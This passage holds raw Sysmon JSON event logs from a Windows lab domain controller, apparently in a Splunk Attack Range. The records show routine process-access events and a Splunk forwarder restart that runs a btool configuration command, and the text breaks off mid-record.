{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2961,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2962,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2963,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2964,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2965,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2966,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.889\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-00102F3B0500}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.889","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-00102F3B0500}","TargetProcessId":"3296","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2967,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.124\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-00102F3B0500}\r\nSourceProcessId: 3296\r\nSourceThreadId: 3496\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.124","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-00102F3B0500}","SourceProcessId":"3296","SourceThreadId":"3496","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2968,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.167\r\nProcessGuid: {41C8662E-1FF0-5F25-0000-0010FE3D0500}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nParentProcessId: 2584\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.167","ProcessGuid":"{41C8662E-1FF0-5F25-0000-0010FE3D0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FEF-5F25-0000-00106D380500}","ParentProcessId":"2584","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2969,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.155\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nSourceProcessId: 2584\r\nSourceThreadId: 3476\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-0010FE3D0500}\r\nTargetProcessId: 3668\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.155","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-00106D380500}","SourceProcessId":"2584","SourceThreadId":"3476","SourceImage":"C:\\Program 